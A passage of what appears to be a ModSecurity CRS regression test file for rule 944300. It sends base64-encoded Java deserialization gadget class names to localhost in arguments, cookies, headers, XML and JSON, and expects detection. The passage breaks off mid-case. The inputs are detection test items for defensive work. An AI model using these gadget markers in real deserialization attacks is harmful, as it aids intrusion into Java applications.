"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-233 + desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-234 + desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-235 + desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-236 + desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-237 + desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-238 + desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-239 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-240 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-241 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-242 + desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-243 + desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-244 + desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-245 + desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-246 + desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-247 + desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-248 + desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-249 + desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-250 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-251 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-252 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-253 + desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-254 + desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-255 + desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-256 + desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-257 + desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-258 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-259 + desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-260 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-261 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-262 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: 
"POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-263 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-264 + desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-265 + desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: 
"POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-266 + desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-267 + desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-268 + desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-269 + desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-270 + desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-271 + desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-272 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-273 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + 